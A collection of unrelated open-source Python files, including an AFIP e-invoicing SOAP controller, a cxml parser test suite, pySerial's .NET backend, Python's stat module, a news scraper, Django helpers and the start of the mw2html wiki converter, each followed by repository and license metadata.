'arrayComprobantesAsociados': [{'comprobanteAsociado': {
'codigoTipoComprobante': cbte_asoc.asociado.tipocbte.cod,
'numeroPuntoVenta': cbte_asoc.asociado.punto_vta,
'numeroComprobante': cbte_asoc.asociado.cbte_nro }} for cbte_asoc in db(db.comprobanteasociado.comprobante == comprobante).select()],
'arrayOtrosTributos': [ {'otroTributo': {
'codigo': tributo.tributo.cod,
'descripcion': unicode(tributo.tributo.ds, "utf-8"),
'baseImponible': moneyornone(tributo.base_imp),
'importe': moneyornone(tributo.importe)}} for tributo in db(db.detalletributo.comprobante == comprobante).select()],
'arraySubtotalesIVA': [{'subtotalIVA': {
'codigo': iva["id"],
'importe': moneyornone(iva["importe"]),
}} for iva in comprobante_sumar_iva(comprobante)],
'arrayItems': [{'item':{
'unidadesMtx': it.umed.cod,
'codigoMtx': it.codigomtx or "0000000000000",
'codigo': it.codigo,
'descripcion': unicode(it.ds, "utf-8"),
'cantidad': it.qty,
'codigoUnidadMedida': it.umed.cod,
'precioUnitario': it.precio,
'importeBonificacion': moneyornone(it.bonif),
'codigoCondicionIVA': it.iva.cod,
'importeIVA': moneyornone(it.imp_iva),
'importeItem': moneyornone(it.imp_total)}} for it in db(db.detalle.comprobante == comprobante).select()]
}
result = client.autorizarComprobante(
authRequest={'token': TOKEN, 'sign': SIGN, 'cuitRepresentada': CUIT},
comprobanteCAERequest = fact,
)
resultado = result['resultado'] # u'A'
actualizar = {"obs": ""}
# actualizar = dict()
obs = []
if result['resultado'] in ("A", "O"):
cbteresp = result['comprobanteResponse']
fecha_cbte = cbteresp['fechaEmision'],
fecha_vto = cbteresp['fechaVencimientoCAE'],
actualizar["cae"] = cbteresp['CAE'], # 60423794871430L,
if resultado == u"A":
session.comprobante = None
else:
response.flash = "El cbte tiene observaciones"
session.comprobante = None
elif result['resultado'] == "R":
session.comprobante = None
for error in result["arrayErrores"]:
obs.append("%(codigo)s: %(descripcion)s" % (error['codigoDescripcion']))
for error in result.get('arrayObservaciones', []):
obs.append("%(codigo)s: %(descripcion)s. " % (error['codigoDescripcion']))
for error in obs:
actualizar["obs"] += error
actualizar["resultado"] = result['resultado']
else:
pass
except SoapFault,sf:
db.xml.insert(request = client.xml_request, response = client.xml_response)
return dict( resultado = {'fault': sf.faultstring}, pdf = None)
except ExpatError, ee:
return dict(resultado = "Error en el Cliente SOAP. Formato de respuesta inválido.", pdf = None)
except (AttributeError, ValueError, TypeError, KeyError), ee:
raise
db.xml.insert(request = client.xml_request, response = client.xml_response)
return dict(resultado = {"fault": "Se produjo un error al procesar los datos del comprobante o los datos enviados son insuficientes. %s" % str(ee)}, pdf = None)
# actualizo el registro del comprobante con el resultado:
if actualizar:
cbttmp = comprobante.as_dict()
for k, v in actualizar.iteritems(): cbttmp[k] = v
db(db.comprobante.id==comprobante).update(**cbttmp)
return dict(resultado = result, pdf = A('Guardar el comprobante en formato PDF', _href=URL(r = request, c="salida", f="guardar_comprobante", args=[comprobante.id,])))
if SERVICE:
try:
# solicito autenticación
if request.controller!="dummy":
TOKEN, SIGN = _autenticar(SERVICE)
# conecto al webservice
if SERVICE == "wsmtxca":
client = SoapClient(
wsdl = WSDL[SERVICE],
cache = PRIVATE_PATH,
ns = "ser",
trace = False,
# voidstr = True # comentar esta línea para pysimplesoap sin modificar
)
else:
client = SoapClient(
wsdl = WSDL[SERVICE],
cache = PRIVATE_PATH,
trace = False,
# voidstr = True # comentar esta línea para pysimplesoap sin modificar
)
except HTTPError, e:
session.mensaje = "Error al solicitar el ticket de acceso: %s" % str(e)
redirect(URL(c="default", f="mensaje"))
| agpl-3.0 |
python-openxml/cxml | tests/test_parser.py | 2 | 8632 | # encoding: utf-8
"""
Test suite for cxml parser module.
"""
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
import sys
sys.path.insert(0, '.')
import pytest
from cxml.lexer import CxmlLexer
from cxml.parser import CxmlParser
from cxml.symbols import (
COLON, COMMA, SNTL, EQUAL, LBRACE, LPAREN, NAME, RBRACE, RPAREN, SLASH,
TEXT, attr, attr_list, attrs, element, nsdecl, qname, root, root_element,
str_attr, tree, tree_list, trees
)
class DescribeParser(object):
def it_can_parse_an_nsdecl(self, nsdecl_fixture):
input_, root_symbol, expected_values = nsdecl_fixture
ast = parse(input_, nsdecl)
assert shallow_eq(ast, root_symbol, expected_values)
def it_can_parse_a_qname(self, qname_fixture):
input_, root_symbol, expected_values = qname_fixture
ast = parse(input_, qname)
assert shallow_eq(ast, root_symbol, expected_values)
def it_can_parse_a_string_attribute(self, str_attr_fixture):
input_, root_symbol, expected_values = str_attr_fixture
ast = parse(input_, str_attr)
assert shallow_eq(ast, root_symbol, expected_values)
def it_can_parse_an_attr(self, attr_fixture):
input_, root_symbol, expected_values = attr_fixture
ast = parse(input_, attr)
assert shallow_eq(ast, root_symbol, expected_values)
def it_can_parse_an_attr_list(self, attr_list_fixture):
input_, root_symbol, expected_values = attr_list_fixture
ast = parse(input_, attr_list)
assert shallow_eq(ast, root_symbol, expected_values)
def it_can_parse_an_attrs(self, attrs_fixture):
input_, root_symbol, expected_values = attrs_fixture
ast = parse(input_, attrs)
assert shallow_eq(ast, root_symbol, expected_values)
def it_can_parse_an_element(self, element_fixture):
input_, root_symbol, expected_values = element_fixture
ast = parse(input_, element)
assert shallow_eq(ast, root_symbol, expected_values)
def it_can_parse_a_tree(self, tree_fixture):
input_, root_symbol, expected_values = tree_fixture
ast = parse(input_, tree)
assert shallow_eq(ast, root_symbol, expected_values)
def it_can_parse_a_tree_list(self, tree_list_fixture):
input_, root_symbol, expected_values = tree_list_fixture
ast = parse(input_, tree_list)
assert shallow_eq(ast, root_symbol, expected_values)
def it_can_parse_a_trees(self, trees_fixture):
input_, root_symbol, expected_values = trees_fixture
ast = parse(input_, trees)
assert shallow_eq(ast, root_symbol, expected_values)
def it_can_parse_a_root_element(self, root_element_fixture):
input_, root_symbol, expected_values = root_element_fixture
ast = parse(input_, root_element)
assert shallow_eq(ast, root_symbol, expected_values)
def it_can_parse_a_root(self, root_fixture):
input_, root_symbol, expected_values = root_fixture
ast = parse(input_, root, emit_sntl=True)
assert shallow_eq(ast, root_symbol, expected_values)
# fixtures -------------------------------------------------------
@pytest.fixture(params=[
('w:', attr, [(nsdecl, 'w:')]),
('w:b=1', attr, [(str_attr, 'w:b=1')]),
])
def attr_fixture(self, request):
input_, root_symbol, expected_values = request.param
return input_, root_symbol, expected_values
@pytest.fixture(params=[
('w:b=1', attr_list, [(attr, 'w:b=1')]),
('r:,w:b=1', attr_list, [
(attr, 'r:'), (COMMA, ','), (attr_list, 'w:b=1')
]),
('r:,w:b=1,w:i=0', attr_list, [
(attr, 'r:'), (COMMA, ','), (attr_list, 'w:b=1,w:i=0')
]),
])
def attr_list_fixture(self, request):
input_, root_symbol, expected_values = request.param
return input_, root_symbol, expected_values
@pytest.fixture(params=[
('{w:}', attrs, [(LBRACE, '{'), (attr_list, 'w:'), (RBRACE, '}')]),
('{w:b=1,r:,w:i=0}', attrs, [
(LBRACE, '{'), (attr_list, 'w:b=1,r:,w:i=0'), (RBRACE, '}')
]),
])
def attrs_fixture(self, request):
input_, root_symbol, expected_values = request.param
return input_, root_symbol, expected_values
@pytest.fixture(params=[
('w:t', element, [(qname, 'w:t')]),
('w:t"foo"', element, [(qname, 'w:t'), (TEXT, 'foo')]),
('w:t{b=1}', element, [(qname, 'w:t'), (attrs, '{b=1}')]),
('w:t{b=1}"foo"', element, [
(qname, 'w:t'), (attrs, '{b=1}'), (TEXT, 'foo')
]),
])
def element_fixture(self, request):
input_, root_symbol, expected_values = request.param
return input_, root_symbol, expected_values
@pytest.fixture(params=[
('w:', nsdecl, [(NAME, 'w'), (COLON, ':')]),
])
def nsdecl_fixture(self, request):
input_, root_symbol, expected_values = request.param
return input_, root_symbol, expected_values
@pytest.fixture(params=[
('foobar', qname, [(NAME, 'foobar')]),
('w:rPr', qname, [(NAME, 'w'), (COLON, ':'), (NAME, 'rPr')]),
])
def qname_fixture(self, request):
input_, root_symbol, expected_values = request.param
return input_, root_symbol, expected_values
@pytest.fixture(params=[
('w:b=1', str_attr, [(qname, 'w:b'), (EQUAL, '='), (TEXT, '1')]),
])
def str_attr_fixture(self, request):
input_, root_symbol, expected_values = request.param
return input_, root_symbol, expected_values
@pytest.fixture(params=[
('elm', tree, [(element, 'elm')]),
('foo/bar', tree, [(element, 'foo'), (SLASH, '/'), (trees, 'bar')]),
])
def tree_fixture(self, request):
input_, root_symbol, expected_values = request.param
return input_, root_symbol, expected_values
@pytest.fixture(params=[
('foo', tree_list, [(tree, 'foo')]),
('foo,bar', tree_list, [
(tree, 'foo'), (COMMA, ','), (tree_list, 'bar')
]),
])
def tree_list_fixture(self, request):
input_, root_symbol, expected_values = request.param
return input_, root_symbol, expected_values
@pytest.fixture(params=[
('foo', trees, [(tree, 'foo')]),
('(foo,bar)', trees, [
(LPAREN, '('), (tree_list, 'foo,bar'), (RPAREN, ')')
]),
])
def trees_fixture(self, request):
input_, root_symbol, expected_values = request.param
return input_, root_symbol, expected_values
@pytest.fixture(params=[
('w:rPr', root_element, [(qname, 'w:rPr')]),
('w:t"foo"', root_element, [(qname, 'w:t'), (TEXT, 'foo')]),
('w:t{a=b}', root_element, [(qname, 'w:t'), (attrs, '{a=b}')]),
('w:t{a=b}bar', root_element, [
(qname, 'w:t'), (attrs, '{a=b}'), (TEXT, 'bar')
]),
])
def root_element_fixture(self, request):
input_, root_symbol, expected_values = request.param
return input_, root_symbol, expected_values
@pytest.fixture(params=[
('w:r', root, [(root_element, 'w:r'), (SNTL, '')]),
('w:r/(w:rPr,w:t)', root, [
(root_element, 'w:r'), (SLASH, '/'), (trees, '(w:rPr,w:t)'),
(SNTL, '')
]),
])
def root_fixture(self, request):
input_, root_symbol, expected_values = request.param
return input_, root_symbol, expected_values
def parse(string, start_symbol, emit_sntl=False):
"""
Return the |ASTNode| object produced by parsing *string* with CxmlParser.
"""
lexer = CxmlLexer(string, emit_sntl=emit_sntl)
parser = CxmlParser(lexer)
return parser.parse(start_symbol)
def shallow_eq(ast, root_symbol, values):
"""
Return |True| if the root node in *ast* has *root_symbol* as its symbol
and *values* matches its child nodes.
"""
if ast.symbol is not root_symbol:
print('root symbol %s != %s' % (ast.symbol, root_symbol))
return False
if len(ast.child_nodes) != len(values):
print('child count: %d != %d' % (len(ast.child_nodes), len(values)))
return False
for idx, (symbol, value) in enumerate(values):
child = ast.child_nodes[idx]
if child.symbol != symbol:
print('child symbol %s != %s' % (child.symbol, symbol))
return False
if child.value != value:
print('child value %s != %s' % (child.value, value))
return False
return True
| mit |
VenJie/linux_2.6.36 | Documentation/networking/cxacru-cf.py | 14668 | 1626 | #!/usr/bin/env python
# Copyright 2009 Simon Arlott
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Usage: cxacru-cf.py < cxacru-cf.bin
# Output: values string suitable for the sysfs adsl_config attribute
#
# Warning: cxacru-cf.bin with MD5 hash cdbac2689969d5ed5d4850f117702110
# contains mis-aligned values which will stop the modem from being able
# to make a connection. If the first and last two bytes are removed then
# the values become valid, but the modulation will be forced to ANSI
# T1.413 only which may not be appropriate.
#
# The original binary format is a packed list of le32 values.
import sys
import struct
i = 0
while True:
buf = sys.stdin.read(4)
if len(buf) == 0:
break
elif len(buf) != 4:
sys.stdout.write("\n")
sys.stderr.write("Error: read {0} not 4 bytes\n".format(len(buf)))
sys.exit(1)
if i > 0:
sys.stdout.write(" ")
sys.stdout.write("{0:x}={1}".format(i, struct.unpack("<I", buf)[0]))
i += 1
sys.stdout.write("\n")
| gpl-3.0 |
etherkit/OpenBeacon2 | client/linux-arm/venv/lib/python3.5/site-packages/serial/serialcli.py | 26 | 9104 | #! python
#
# Backend for .NET/Mono (IronPython), .NET >= 2
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C) 2008-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import System
import System.IO.Ports
from serial.serialutil import *
# must invoke function with byte array, make a helper to convert strings
# to byte arrays
sab = System.Array[System.Byte]
def as_byte_array(string):
return sab([ord(x) for x in string]) # XXX will require adaption when run with a 3.x compatible IronPython
class Serial(SerialBase):
"""Serial port implementation for .NET/Mono."""
BAUDRATES = (50, 75, 110, 134, 150, 200, 300, 600, 1200, 1800, 2400, 4800,
9600, 19200, 38400, 57600, 115200)
def open(self):
"""\
Open port with current settings. This may throw a SerialException
if the port cannot be opened.
"""
if self._port is None:
raise SerialException("Port must be configured before it can be used.")
if self.is_open:
raise SerialException("Port is already open.")
try:
self._port_handle = System.IO.Ports.SerialPort(self.portstr)
except Exception as msg:
self._port_handle = None
raise SerialException("could not open port %s: %s" % (self.portstr, msg))
# if RTS and/or DTR are not set before open, they default to True
if self._rts_state is None:
self._rts_state = True
if self._dtr_state is None:
self._dtr_state = True
self._reconfigure_port()
self._port_handle.Open()
self.is_open = True
if not self._dsrdtr:
self._update_dtr_state()
if not self._rtscts:
self._update_rts_state()
self.reset_input_buffer()
def _reconfigure_port(self):
"""Set communication parameters on opened port."""
if not self._port_handle:
raise SerialException("Can only operate on a valid port handle")
#~ self._port_handle.ReceivedBytesThreshold = 1
if self._timeout is None:
self._port_handle.ReadTimeout = System.IO.Ports.SerialPort.InfiniteTimeout
else:
self._port_handle.ReadTimeout = int(self._timeout * 1000)
# if self._timeout != 0 and self._interCharTimeout is not None:
# timeouts = (int(self._interCharTimeout * 1000),) + timeouts[1:]
if self._write_timeout is None:
self._port_handle.WriteTimeout = System.IO.Ports.SerialPort.InfiniteTimeout
else:
self._port_handle.WriteTimeout = int(self._write_timeout * 1000)
# Setup the connection info.
try:
self._port_handle.BaudRate = self._baudrate
except IOError as e:
# catch errors from illegal baudrate settings
raise ValueError(str(e))
if self._bytesize == FIVEBITS:
self._port_handle.DataBits = 5
elif self._bytesize == SIXBITS:
self._port_handle.DataBits = 6
elif self._bytesize == SEVENBITS:
self._port_handle.DataBits = 7
elif self._bytesize == EIGHTBITS:
self._port_handle.DataBits = 8
else:
raise ValueError("Unsupported number of data bits: %r" % self._bytesize)
if self._parity == PARITY_NONE:
self._port_handle.Parity = getattr(System.IO.Ports.Parity, 'None') # reserved keyword in Py3k
elif self._parity == PARITY_EVEN:
self._port_handle.Parity = System.IO.Ports.Parity.Even
elif self._parity == PARITY_ODD:
self._port_handle.Parity = System.IO.Ports.Parity.Odd
elif self._parity == PARITY_MARK:
self._port_handle.Parity = System.IO.Ports.Parity.Mark
elif self._parity == PARITY_SPACE:
self._port_handle.Parity = System.IO.Ports.Parity.Space
else:
raise ValueError("Unsupported parity mode: %r" % self._parity)
if self._stopbits == STOPBITS_ONE:
self._port_handle.StopBits = System.IO.Ports.StopBits.One
elif self._stopbits == STOPBITS_ONE_POINT_FIVE:
self._port_handle.StopBits = System.IO.Ports.StopBits.OnePointFive
elif self._stopbits == STOPBITS_TWO:
self._port_handle.StopBits = System.IO.Ports.StopBits.Two
else:
raise ValueError("Unsupported number of stop bits: %r" % self._stopbits)
if self._rtscts and self._xonxoff:
self._port_handle.Handshake = System.IO.Ports.Handshake.RequestToSendXOnXOff
elif self._rtscts:
self._port_handle.Handshake = System.IO.Ports.Handshake.RequestToSend
elif self._xonxoff:
self._port_handle.Handshake = System.IO.Ports.Handshake.XOnXOff
else:
self._port_handle.Handshake = getattr(System.IO.Ports.Handshake, 'None') # reserved keyword in Py3k
#~ def __del__(self):
#~ self.close()
def close(self):
"""Close port"""
if self.is_open:
if self._port_handle:
try:
self._port_handle.Close()
except System.IO.Ports.InvalidOperationException:
# ignore errors. can happen for unplugged USB serial devices
pass
self._port_handle = None
self.is_open = False
# - - - - - - - - - - - - - - - - - - - - - - - -
@property
def in_waiting(self):
"""Return the number of characters currently in the input buffer."""
if not self.is_open:
raise portNotOpenError
return self._port_handle.BytesToRead
def read(self, size=1):
"""\
Read size bytes from the serial port. If a timeout is set it may
return less characters as requested. With no timeout it will block
until the requested number of bytes is read.
"""
if not self.is_open:
raise portNotOpenError
# must use single byte reads as this is the only way to read
# without applying encodings
data = bytearray()
while size:
try:
data.append(self._port_handle.ReadByte())
except System.TimeoutException:
break
else:
size -= 1
return bytes(data)
def write(self, data):
"""Output the given string over the serial port."""
if not self.is_open:
raise portNotOpenError
#~ if not isinstance(data, (bytes, bytearray)):
#~ raise TypeError('expected %s or bytearray, got %s' % (bytes, type(data)))
try:
# must call overloaded method with byte array argument
# as this is the only one not applying encodings
self._port_handle.Write(as_byte_array(data), 0, len(data))
except System.TimeoutException:
raise writeTimeoutError
return len(data)
def reset_input_buffer(self):
"""Clear input buffer, discarding all that is in the buffer."""
if not self.is_open:
raise portNotOpenError
self._port_handle.DiscardInBuffer()
def reset_output_buffer(self):
"""\
Clear output buffer, aborting the current output and
discarding all that is in the buffer.
"""
if not self.is_open:
raise portNotOpenError
self._port_handle.DiscardOutBuffer()
def _update_break_state(self):
"""
Set break: Controls TXD. When active, to transmitting is possible.
"""
if not self.is_open:
raise portNotOpenError
self._port_handle.BreakState = bool(self._break_state)
def _update_rts_state(self):
"""Set terminal status line: Request To Send"""
if not self.is_open:
raise portNotOpenError
self._port_handle.RtsEnable = bool(self._rts_state)
def _update_dtr_state(self):
"""Set terminal status line: Data Terminal Ready"""
if not self.is_open:
raise portNotOpenError
self._port_handle.DtrEnable = bool(self._dtr_state)
@property
def cts(self):
"""Read terminal status line: Clear To Send"""
if not self.is_open:
raise portNotOpenError
return self._port_handle.CtsHolding
@property
def dsr(self):
"""Read terminal status line: Data Set Ready"""
if not self.is_open:
raise portNotOpenError
return self._port_handle.DsrHolding
@property
def ri(self):
"""Read terminal status line: Ring Indicator"""
if not self.is_open:
raise portNotOpenError
#~ return self._port_handle.XXX
return False # XXX an error would be better
@property
def cd(self):
"""Read terminal status line: Carrier Detect"""
if not self.is_open:
raise portNotOpenError
return self._port_handle.CDHolding
# - - platform specific - - - -
# none
| gpl-3.0 |
cactusbin/nyt | matplotlib/examples/axes_grid/demo_colorbar_with_inset_locator.py | 7 | 1052 | import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=[6, 3])
axins1 = inset_axes(ax1,
width="50%", # width = 10% of parent_bbox width
height="5%", # height : 50%
loc=1)
im1=ax1.imshow([[1,2],[2, 3]])
plt.colorbar(im1, cax=axins1, orientation="horizontal", ticks=[1,2,3])
axins1.xaxis.set_ticks_position("bottom")
axins = inset_axes(ax2,
width="5%", # width = 10% of parent_bbox width
height="50%", # height : 50%
loc=3,
bbox_to_anchor=(1.05, 0., 1, 1),
bbox_transform=ax2.transAxes,
borderpad=0,
)
# Controlling the placement of the inset axes is basically same as that
# of the legend. you may want to play with the borderpad value and
# the bbox_to_anchor coordinate.
im=ax2.imshow([[1,2],[2, 3]])
plt.colorbar(im, cax=axins, ticks=[1,2,3])
plt.draw()
plt.show()
| unlicense |
rfinn/LCS | paper1code/LCSgetfinalellipse.py | 1 | 1122 | #!/usr/bin/env python
"""
grab contents of directories of post-ellipse-processed images so we can track what happened to each galaxy.
did r-band make it to final finished directory?
did 24um make it to final finished directory?
if not, what happened?
NerabyObjects
OffCenter
PartialImages
PeculiarGalaxies
Finished
Finished also has reject subdirectory
"""
from pylab import *
import glob
import os
from LCScommon import *
originaldir='/home/rfinn/research/LocalClusters/cutouts/' #where original cutouts are
cutoutpath='/home/alissa/LocalClusters/cutouts/' # where processed cutouts are
subdirectories=['NearbyObjects','OffCenter','PartialImages','PeculiarGalaxies','Finished','Finished/reject']
for cl in clusternames: #loop over clusters
#get list of original cutouts
#make dictionary that associates agc name with list index
#loop over subdirectories
#ellipseflag24 for finished 24
#ellipseid24 to track why galaxy was rejected
#ellipseflag for finished rband
#ellipseid to track why galaxy was rejected
#add columns to mastertable? or should I do that in LCSmkcutouts?
| gpl-3.0 |
yqm/sl4a | python/src/Lib/stat.py | 179 | 1718 | """Constants/functions for interpreting results of os.stat() and os.lstat().
Suggested usage: from stat import *
"""
# Indices for stat struct members in the tuple returned by os.stat()
ST_MODE = 0
ST_INO = 1
ST_DEV = 2
ST_NLINK = 3
ST_UID = 4
ST_GID = 5
ST_SIZE = 6
ST_ATIME = 7
ST_MTIME = 8
ST_CTIME = 9
# Extract bits from the mode
def S_IMODE(mode):
return mode & 07777
def S_IFMT(mode):
return mode & 0170000
# Constants used as S_IFMT() for various file types
# (not all are implemented on all systems)
S_IFDIR = 0040000
S_IFCHR = 0020000
S_IFBLK = 0060000
S_IFREG = 0100000
S_IFIFO = 0010000
S_IFLNK = 0120000
S_IFSOCK = 0140000
# Functions to test for each file type
def S_ISDIR(mode):
return S_IFMT(mode) == S_IFDIR
def S_ISCHR(mode):
return S_IFMT(mode) == S_IFCHR
def S_ISBLK(mode):
return S_IFMT(mode) == S_IFBLK
def S_ISREG(mode):
return S_IFMT(mode) == S_IFREG
def S_ISFIFO(mode):
return S_IFMT(mode) == S_IFIFO
def S_ISLNK(mode):
return S_IFMT(mode) == S_IFLNK
def S_ISSOCK(mode):
return S_IFMT(mode) == S_IFSOCK
# Names for permission bits
S_ISUID = 04000
S_ISGID = 02000
S_ENFMT = S_ISGID
S_ISVTX = 01000
S_IREAD = 00400
S_IWRITE = 00200
S_IEXEC = 00100
S_IRWXU = 00700
S_IRUSR = 00400
S_IWUSR = 00200
S_IXUSR = 00100
S_IRWXG = 00070
S_IRGRP = 00040
S_IWGRP = 00020
S_IXGRP = 00010
S_IRWXO = 00007
S_IROTH = 00004
S_IWOTH = 00002
S_IXOTH = 00001
# Names for file flags
UF_NODUMP = 0x00000001
UF_IMMUTABLE = 0x00000002
UF_APPEND = 0x00000004
UF_OPAQUE = 0x00000008
UF_NOUNLINK = 0x00000010
SF_ARCHIVED = 0x00010000
SF_IMMUTABLE = 0x00020000
SF_APPEND = 0x00040000
SF_NOUNLINK = 0x00100000
SF_SNAPSHOT = 0x00200000
| apache-2.0 |
SHSTuringClub/aria | sites/bjnews.py | 1 | 2445 | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Aria - A simple script for automatically grabbing news from the Internet.
# Copyright (C) 2015 Genesis Di
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
def get(timestamp_thr=0):
import httplib2
import urllib.request
import os
import sys
import json
import time
TIMEFORMAT = '%Y-%m-%d %X'
h = httplib2.Http(os.devnull) # Currently no cache file is needed
(resp_headers, content) = h.request("http://www.bjnews.com.cn/api/get_hotlist.php", "GET")
if resp_headers['status'] != '200':
print("Fatal Error: return value " + resp_headers['status'] + "!! Check Internet connection... Exiting...")
sys.exit(1)
try:
tmpdata = json.loads(str(content.decode('unicode-escape')))['list']
if not os.path.exists('pic'):
os.mkdir('pic')
data = []
for i in tmpdata:
if i['hot_pic'] and time.mktime(time.strptime(i['submit_time'], TIMEFORMAT)) > timestamp_thr:
tmp = {}
tmp['title'] = i['title']
tmp['time'] = time.strptime(i['submit_time'], TIMEFORMAT)
tmp['timestamp'] = time.mktime(tmp['time'])
tmp['source'] = '新京报'
pic_path = 'pic' + os.sep + str(hash(str(tmp))) + '.jpg'
# Makes sure that no pictures are downloaded with the same file name.
urllib.request.urlretrieve(i['hot_pic'],pic_path)
tmp['pic'] = pic_path
tmp['pic_src'] = i['hot_pic']
data.append(tmp)
except Exception as e:
print("Exception occurred! Quitting... " + 'Exception' + ":" + str(e))
sys.exit(1)
data = sorted(data, key=lambda j: j['timestamp'], reverse=True)
return data
| gpl-3.0 |
OrlyMar/gasistafelice | gasistafelice/lib/djangolib.py | 6 | 1957 |
def get_qs_filter_dict_from_str(flt_string):
"""Given a string which represent a querySet filter, return a filter.
Useful to be passed as **dict in filter() methods.
"""
flt = {}
# build filter
if "," not in flt_string:
try:
k,v = flt_string.split('=')
except ValueError:
raise
flt[k] = v
else:
for couple in flt_string.split(','):
try:
k,v = couple.split('=')
except ValueError:
raise
flt[k] = v
return flt
def get_instance_dict_from_attrs(obj, attr_names):
"""Given a model instance and a list of attributes, returns a dict"""
d = {}
for attr_name in attr_names:
# retrieve attributes and build dict for template
# Support for nested attributes
nested_attrs = attr_name.split('.')
attr = obj
for nested_attr in nested_attrs:
attr = getattr(attr, nested_attr)
if callable(attr):
v = attr()
else:
v = attr
d[attr_name] = v
return d
def queryset_from_iterable(model, iterable):
"""
Take a model class and an iterable containing instances of that model;
return a ``QuerySet`` containing exactly those instances (barring duplicates, if any).
If ``iterable`` contains an object that isn't an instance of ``model``, raise ``TypeError``.
"""
# collect the set of IDs (i.e. primary keys) of model instances
# contained in the given iterable (using a ``set`` object as accumulator,
# in order to avoid duplicates)
id_set = set()
for obj in iterable:
if obj.__class__ == model:
id_set.add(obj.pk)
else:
raise TypeError(_(u"Can't create a %(model)s QuerySet: %(obj)s is not an instance of model %(model)s"))
qs = model._default_manager.filter(pk__in=id_set)
return qs
| agpl-3.0 |
0-wiz-0/audacity | scripts/mw2html_audacity/mw2html.py | 16 | 36761 | #! /usr/bin/env python
"""
mw2html - Mediawiki to static HTML
I use this to create a personal website from a local mediawiki
installation. No search functionality. Hacks the Monobook skin and
the produced HTML.
Connelly Barnes 2005. Public domain.
Reworked by Andre Pinto 2009.
Improved performance.
Improved filtering.
Improved usability.
Customized for Audacity's manual wiki.
Minor tweaks (for Audacity) By James Crook, Nov 2009.
...
"""
__version__ = '0.1.0.0'
import re
import sys
import getopt
import random
import urllib
import textwrap
import urlparse
import os, os.path
import errno
import hashlib
import httplib
#import pdb
from time import strftime
try:
set
except:
from sets import Set as set
try:
import htmldata
except:
print 'Requires Python htmldata module:'
print ' http://www.connellybarnes.com/code/htmldata/'
sys.exit()
config = None
MOVE_HREF = 'movehref'
MADE_BY_COMMENT = '<!-- Content generated by Mediawiki and mw2html -->'
INDEX_HTML = 'index.html'
QHELP_HTML = 'quick_help.html'
url_filename_cache = {}
redir_cache = {}
wrote_file_set = set()
sidebar_html = ''
footer_text = ''
counter = 0
errors = 0
conn = None
domain = ''
MONOBOOK_SKIN = 'monobook' # Constant identifier for Monobook.
class Config:
"""
Instances contain all options passed at the command line.
"""
def __init__(self, rooturl, outdir,
flatten=True, index=None, clean=True,
sidebar=None, hack_skin=True,
made_by=True, overwrite=False, footer=None,
skin=MONOBOOK_SKIN, move_href=True,
remove_png=True, remove_history=True, limit_parent=False,
special_mode=False, debug=False, no_images=False):
self.rooturl = rooturl
self.outdir = os.path.abspath(outdir)
self.flatten = flatten
self.index = index
self.clean = clean
self.sidebar = sidebar
self.hack_skin = hack_skin
self.made_by = made_by
self.overwrite = overwrite
self.footer = footer
self.skin = skin
self.move_href = move_href
if self.sidebar is not None:
self.sidebar = os.path.abspath(self.sidebar)
if self.footer is not None:
self.footer = os.path.abspath(self.footer)
self.remove_png = remove_png
self.remove_history = remove_history
self.limit_parent = limit_parent
self.special_mode = special_mode
self.debug = debug
self.no_images = no_images
def get_domain(u):
"""
Get domain of URL.
"""
url = normalize_url(u)
#ParseResult(scheme='http', netloc='www.cwi.nl:80', path='/%7Eguido/Python.html', params='', query='', fragment='')
L = list(urlparse.urlparse(url))
return L[1]
def normalize_url(url, lower=True):
# url normalization - only for local comparison operations, use original url for online requests
url = split_section(url)[0]
if lower:
url = url.lower()
if url.startswith('http://'):
url = url[len('http://'):]
if url.startswith('www.'):
url = url[len('www.'):]
url = url.strip('/')
url = 'http://' + url
urlparse.urljoin(config.rooturl, url)
return url
def find_tag_limits(doc, filter_string, end_tag, start_tag, start_point=0):
# find tag limits - start_string must be an unique identifier within doc
i1 = doc.find(filter_string, start_point)
if i1 == -1:
return (-1, -1)
aux = doc.rfind(start_tag, start_point, i1 + len(filter_string))
# we've found the filter_string but it has not the start_tag, so we return a different value
# telling the script to keep searching starting on the end of the filter_string found
if aux == -1:
return (-2, i1 + len(filter_string))
i1 = aux
sdiv = i1
ediv = i1 + len(start_tag)
while(sdiv < ediv and sdiv != -1):
sdiv = doc.find(start_tag, sdiv + len(start_tag))
ediv = doc.find(end_tag , ediv + len(end_tag))
return (i1, ediv)
def clean_tag(doc, filter_string, end_tag, start_tag):
#clean tagged text function
start_point = 0
while True:
(start1, start2) = find_tag_limits(doc, filter_string, end_tag, start_tag, start_point)
if start1 == -1 or start2 == -1:
return doc
if start1 == -2:
start_point = start2
continue
end1 = doc.find('>', start1) + 1;
end2 = start2 + len(end_tag);
doc = doc[:start1] + doc[end1:start2] + doc[end2:]
def remove_tag(doc, start_string, end_tag, start_tag):
#remove tagged text function
while True:
(i1, i2) = find_tag_limits(doc, start_string, end_tag, start_tag)
if i1 == -1 or i2 == -1:
return doc
doc = doc[:i1] + doc[i2 + len(end_tag):]
def monobook_fix_html(doc, page_url):
"""
Sets sidebar for Mediawiki 1.4beta6 Monobook HTML output.
"""
global config
if config.made_by:
doc = doc.replace('<html xmlns=', MADE_BY_COMMENT + '\n<html xmlns=')
